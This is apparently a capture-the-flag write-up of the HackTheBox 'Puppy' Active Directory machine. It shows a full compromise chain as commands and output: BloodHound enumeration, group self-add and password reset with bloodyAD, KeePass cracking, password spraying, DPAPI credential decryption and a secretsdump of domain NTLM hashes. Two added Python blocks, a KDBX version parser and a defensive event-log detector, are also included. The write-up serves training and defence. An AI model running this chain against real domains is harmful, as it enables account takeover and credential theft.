Basic information

As is common in real life pentests, you will start the Puppy box with credentials for the following account: levi.james / KingofAkron2025!

Port scan

No web ports; only the usual Windows domain ports:

$ nmap -sC -sV -Pn 10.10.11.70
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-22 14:38 JST
Nmap scan report for 10.10.11.70
Host is up (0.18s latency).
Not shown: 985 filtered tcp ports (no-response)
Bug in iscsi-info: no string output.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-22 12:19:03Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2049/tcp open nlockmgr 1-4 (RPC #100021)
3260/tcp open iscsi?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-05-22T12:20:56
|_ start_date: N/A
|_clock-skew: 6h39m03s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 256.71 seconds

SMB

Using the provided credentials to list the SMB shares, a DEV share is visible, but the account has no access to it:

python3 examples/smbclient.py levi.james:'KingofAkron2025!'@10.10.11.70

BloodHound

After adding a hosts entry, run the usual BloodHound collection:

10.10.11.70 dc.puppy.htb puppy.htb

bloodhound-python -u levi.james -p 'KingofAkron2025!' -d 'puppy.htb' -ns 10.10.11.70 --zip -c All -dc 'dc.puppy.htb'

The starting path is obvious: levi.james belongs to the HR group, which has GenericWrite over the DEVELOPERS group, so we can add ourselves to DEVELOPERS and then read the DEV share seen earlier:

levi.james to ant.edwards

DEV

First, add ourselves to the DEVELOPERS group:

bloodyAD --host 10.10.11.70 -d puppy.htb -u 'levi.james' -p 'KingofAkron2025!' add groupMember 'DEVELOPERS' 'levi.james'

Then list DEV again; it contains a kdbx file, which we download:

keepass

Standard cracking; pay attention to the KDBX version:

./keepass4brute.sh ../recovery.kdbx /usr/share/wordlists/rockyou.txt

[*] Password found: liverpool
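Because the KDBX version decides which header layout and KDF (and therefore which cracking tooling) applies, here is an added Python parser for the KDBX file signature and version; it is not from the post, and the 12-byte sample headers are constructed inline rather than taken from recovery.kdbx.

```python
import struct

# KeePass file signatures: two little-endian uint32 values at offset 0 and 4
KDBX_SIG1 = 0x9AA2D903
KDBX_SIG2 = 0xB54BFB67       # KeePass 2 database (KDBX)
KDBX_PRE_SIG2 = 0xB54BFB66   # KeePass 2 pre-release format
KDB1_SIG2 = 0xB54BFB65       # legacy KeePass 1.x .kdb


def kdbx_version(header: bytes):
    """Return (major, minor) from the first 12 bytes of a KDBX file.

    Bytes 8-11 hold a uint32 whose high 16 bits are the major version and
    low 16 bits the minor version (0x00030001 = 3.1, 0x00040000 = 4.0).
    """
    if len(header) < 12:
        raise ValueError("need at least 12 header bytes")
    sig1, sig2, version = struct.unpack("<III", header[:12])
    if sig1 != KDBX_SIG1:
        raise ValueError("not a KeePass database (bad signature 1)")
    if sig2 == KDB1_SIG2:
        raise ValueError("KeePass 1.x .kdb file, not KDBX")
    if sig2 not in (KDBX_SIG2, KDBX_PRE_SIG2):
        raise ValueError("unknown signature 2: 0x%08x" % sig2)
    return version >> 16, version & 0xFFFF


def describe(header: bytes) -> str:
    """Summarise what the version implies for the rest of the header."""
    major, minor = kdbx_version(header)
    if major >= 4:
        return (f"KDBX {major}.{minor}: 4-byte header field lengths, "
                "KDF parameters in a variant dictionary (Argon2 possible)")
    return (f"KDBX {major}.{minor}: 2-byte header field lengths, "
            "AES-KDF with TransformSeed/TransformRounds")


def version_of_file(path: str):
    """Read only the 12-byte prefix of a real file on disk."""
    with open(path, "rb") as f:
        return kdbx_version(f.read(12))


# Constructed sample headers (only the 12-byte prefix, no real database data)
SAMPLE_KDBX31 = struct.pack("<III", KDBX_SIG1, KDBX_SIG2, 0x00030001)
SAMPLE_KDBX40 = struct.pack("<III", KDBX_SIG1, KDBX_SIG2, 0x00040000)
```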

Then open the kdbx file and read the passwords stored in it:

JAMIE WILLIAMSON : JamieLove2025!
ADAM SILVER : HJKL2025!
ANTONY C. EDWARDS : Antman2025!
STEVE TUCKER : Steve2025!
SAMUEL BLAKE : ILY2025!

ant.edwards

Spraying the usernames collected from BloodHound against these passwords, ant.edwards turns out to be valid:

nxc smb 10.10.11.70 -u users.txt -p pass.txt

SMB 10.10.11.70 445 DC [+] PUPPY.HTB\ant.edwards:Antman2025!

ant.edwards to adam.silver

ant.edwards belongs to the SENIOR DEVS group, which has GenericAll over adam.silver.

However, adam.silver is disabled, so the account must be enabled first:

bloodyAD --host 10.10.11.70 -d puppy.htb -u ant.edwards -p 'Antman2025!' remove uac 'ADAM.SILVER' -f ACCOUNTDISABLE

After that, the password can simply be reset directly:

bloodyAD --host 10.10.11.70 -d puppy.htb -u ant.edwards -p 'Antman2025!' --dc 10.10.11.70 set password "adam.silver" 'Passw@rd'
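From the defender's side, both the self-add to DEVELOPERS in the DEV step and the enable-then-reset of adam.silver above leave a recognisable trace in the DC Security log (4728 member added to a global group, 4722 account enabled, 4724 password reset). This added Python detection, not part of the post, runs those two rules over constructed sample events whose field names mirror SubjectUserName, TargetUserName and MemberName.

```python
from datetime import datetime, timedelta

# Constructed sample events modelled on this box's chain (not real DC logs).
# subject = SubjectUserName (actor); target = group for 4728, account for
# 4722/4724; member = MemberName for 4728.
SAMPLE_EVENTS = [
    {"time": "2025-05-22T12:30:00", "id": 4728, "subject": "levi.james",
     "target": "DEVELOPERS", "member": "levi.james"},
    {"time": "2025-05-22T12:31:10", "id": 4728, "subject": "hr.admin",
     "target": "DEVELOPERS", "member": "new.hire"},
    {"time": "2025-05-22T12:45:00", "id": 4722, "subject": "ant.edwards",
     "target": "adam.silver"},
    {"time": "2025-05-22T12:46:30", "id": 4724, "subject": "ant.edwards",
     "target": "adam.silver"},
    {"time": "2025-05-22T13:10:00", "id": 4724, "subject": "helpdesk",
     "target": "jamie.williams"},
]


def detect(events, window=timedelta(minutes=15)):
    """Return (rule, actor, target) alerts for the two abuse patterns."""
    alerts = []
    enabled_at = {}  # (actor, account) -> time of the 4722 enable event
    for e in sorted(events, key=lambda ev: ev["time"]):
        t = datetime.fromisoformat(e["time"])
        actor = e["subject"].lower()
        if e["id"] == 4728 and e.get("member", "").lower() == actor:
            # an account adding itself to a group: GenericWrite abuse pattern
            alerts.append(("self-add-to-group", e["subject"], e["target"]))
        elif e["id"] == 4722:
            enabled_at[(actor, e["target"].lower())] = t
        elif e["id"] == 4724:
            key = (actor, e["target"].lower())
            if key in enabled_at and t - enabled_at[key] <= window:
                # enable followed by a reset by the same actor within the
                # window: takeover of a dormant account via GenericAll
                alerts.append(("enable-then-reset", e["subject"], e["target"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The helpdesk reset of jamie.williams produces no alert because no 4722 precedes it; a real pipeline would feed parsed EVTX records into detect() in the same shape.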

user flag

After changing the password, log in as adam.silver; the user flag is on the desktop:

evil-winrm -i 10.10.11.70 -u 'adam.silver' -p 'Passw@rd'

backups

The root of the C: drive has a backups directory containing an archive; download it and take a look:

The configuration file backup inside it yields the steph.cooper credentials:

steph.cooper
ChefSteph2025!

steph.cooper

The credentials are valid and allow a login; also note that steph.cooper has a separate ADM account:

evil-winrm -i 10.10.11.70 -u steph.cooper -p 'ChefSteph2025!'

So this is the usual DPAPI case: one person with two accounts and a saved credential.

dpapi

Download the relevant files and decrypt them locally:

C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9
C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407


python3 examples/dpapi.py masterkey -file 556a2412-1275-4ccf-b721-e6a0b4f90407 -sid S-1-5-21-1487982659-1829050783-2281216199-1107 -password 'ChefSteph2025!'

Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84

python3 examples/dpapi.py credential -file "C8D69EBE9A43E9DEBF6B5FBD48B521B9" -key "0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84"

Username : steph.cooper_adm
Unknown : FivethChipOnItsWay2025!

root flag

The recovered account has administrative privileges:

evil-winrm -i 10.10.11.70 -u steph.cooper_adm -p 'FivethChipOnItsWay2025!'

hashdump

python3 examples/secretsdump.py steph.cooper_adm:'FivethChipOnItsWay2025!'@10.10.11.70 -just-dc-ntlm

Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb0edc15e49ceb4120c7bd7e6e65d75b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a4f2989236a639ef3f766e5fe1aad94a:::
PUPPY.HTB\levi.james:1103:aad3b435b51404eeaad3b435b51404ee:ff4269fdf7e4a3093995466570f435b8:::
PUPPY.HTB\ant.edwards:1104:aad3b435b51404eeaad3b435b51404ee:afac881b79a524c8e99d2b34f438058b:::
PUPPY.HTB\adam.silver:1105:aad3b435b51404eeaad3b435b51404ee:a7d7c07487ba2a4b32fb1d0953812d66:::
PUPPY.HTB\jamie.williams:1106:aad3b435b51404eeaad3b435b51404ee:bd0b8a08abd5a98a213fc8e3c7fca780:::
PUPPY.HTB\steph.cooper:1107:aad3b435b51404eeaad3b435b51404ee:b261b5f931285ce8ea01a8613f09200b:::
PUPPY.HTB\steph.cooper_adm:1111:aad3b435b51404eeaad3b435b51404ee:ccb206409049bc53502039b80f3f1173:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5047916131e6ba897f975fc5f19c8df:::

References